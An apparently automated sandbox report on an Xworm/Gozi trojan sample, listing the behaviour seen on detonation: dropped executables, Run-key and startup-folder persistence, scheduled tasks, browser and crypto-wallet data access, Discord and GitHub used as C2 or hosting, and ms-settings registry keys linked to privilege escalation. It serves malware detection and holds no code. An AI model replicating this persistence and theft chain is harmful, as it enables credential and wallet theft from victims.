Malware Analysis Report

2025-01-22 18:56

Sample ID 240310-v72e9ahb94
Target Gk67Vl
SHA256 8ef0aa04db9fe87fe3e9d92103882dde1531a55f8c7fcbceda55f8ae4f501435
Tags
gozi xworm banker isfb persistence pyinstaller rat spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

8ef0aa04db9fe87fe3e9d92103882dde1531a55f8c7fcbceda55f8ae4f501435

Threat Level: Known bad

The file Gk67Vl was found to be: Known bad.

Malicious Activity Summary

gozi xworm banker isfb persistence pyinstaller rat spyware stealer trojan

Xworm

Gozi

Detect Xworm Payload

Checks computer location settings

Executes dropped EXE

Drops startup file

Reads user/profile data of web browsers

Loads dropped DLL

Legitimate hosting services abused for malware hosting/C2

Adds Run key to start application

Looks up external IP address via web service

Accesses cryptocurrency files/wallets, possible credential harvesting

Enumerates physical storage devices

Detects Pyinstaller

Uses Task Scheduler COM API

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of FindShellTrayWindow

Modifies registry class

Suspicious use of AdjustPrivilegeToken

Creates scheduled task(s)

Enumerates system info in registry

Suspicious use of WriteProcessMemory

Suspicious use of SendNotifyMessage

Checks SCSI registry key(s)

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-03-10 17:38

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-03-10 17:38

Reported

2024-03-10 17:43

Platform

win10v2004-20240226-en

Max time kernel

237s

Max time network

236s

Command Line

C:\Windows\Explorer.EXE

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Gozi

banker trojan gozi

Xworm

trojan rat xworm

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Downloads\CatrinePerm\CatrinePerm.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\WinRAR.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\wscript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Downloads\CatrinePerm\CatrinePerm.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Control Panel\International\Geo\Nation C:\Windows\system32\wscript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Downloads\CatrinePerm\CatrinePerm.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\Win (3).exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\RtkBtAudioServ.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\Win (3).exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\Win (3).exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pythonw.exe C:\Users\Admin\AppData\Local\Temp\pythonw.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Update.lnk C:\Users\Admin\AppData\Local\Temp\WinRAR.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Update.lnk C:\Users\Admin\AppData\Local\Temp\WinRAR.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pythonw.exe C:\Users\Admin\AppData\Local\Temp\pythonw.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pythonw.exe C:\Users\Admin\AppData\Local\Temp\pythonw.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\Downloads\CatrinePerm\CatrinePerm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Win (3).exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\CatrinePerm.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WinRAR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pythonw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RtkBtAudioServ.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pythonw.exe N/A
N/A N/A C:\Users\Admin\Downloads\CatrinePerm\CatrinePerm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Win (3).exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\CatrinePerm.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WinRAR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pythonw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RtkBtAudioServ.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pythonw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\opwotwbz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\opwotwbz.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Update.exe N/A
N/A N/A C:\Users\Admin\Downloads\CatrinePerm\CatrinePerm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Win (3).exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\CatrinePerm.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WinRAR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pythonw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RtkBtAudioServ.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pythonw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Update.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\pythonw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pythonw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pythonw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pythonw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pythonw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pythonw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pythonw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pythonw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pythonw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pythonw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pythonw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pythonw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pythonw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pythonw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pythonw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pythonw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pythonw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pythonw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pythonw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pythonw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pythonw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pythonw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pythonw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pythonw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pythonw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pythonw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pythonw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pythonw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pythonw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pythonw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pythonw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pythonw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pythonw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pythonw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pythonw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pythonw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pythonw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pythonw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pythonw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pythonw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pythonw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pythonw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pythonw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pythonw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pythonw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pythonw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pythonw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pythonw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pythonw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pythonw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pythonw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pythonw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pythonw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pythonw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pythonw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pythonw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pythonw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pythonw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pythonw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pythonw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pythonw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pythonw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pythonw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pythonw.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update = "C:\\Users\\Admin\\AppData\\Roaming\\Update.exe" C:\Users\Admin\AppData\Local\Temp\WinRAR.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A
N/A checkip.amazonaws.com N/A N/A
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 C:\Windows\system32\taskmgr.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202020202 C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295" C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\MaxPos1280x720x96(1).x = "4294967295" C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1280x720x96(1).right = "1246" C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" C:\Windows\Explorer.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" C:\Windows\Explorer.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\SniffedFolderType = "Generic" C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\3\NodeSlot = "6" C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\3\0\MRUListEx = ffffffff C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0" C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WFlags = "0" C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\1\MRUListEx = ffffffff C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202 C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\2 C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{885A186E-A440-4ADA-812B-DB871B942259} C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616209" C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193" C:\Windows\Explorer.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\SniffedFolderType = "Generic" C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\ms-settings\shell\open\command C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\ms-settings\shell\open C:\Windows\SysWOW64\reg.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\MinPos1280x720x96(1).y = "4294967295" C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 C:\Windows\Explorer.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Generic" C:\Windows\Explorer.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}" C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\Version = "1" C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\GroupView = "4294967295" C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0 C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\MRUListEx = 020000000100000000000000ffffffff C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202 C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\ShowCmd = "1" C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\ms-settings C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\ms-settings\shell\open\command C:\Windows\SysWOW64\reg.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" C:\Windows\Explorer.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}" C:\Windows\Explorer.EXE N/A
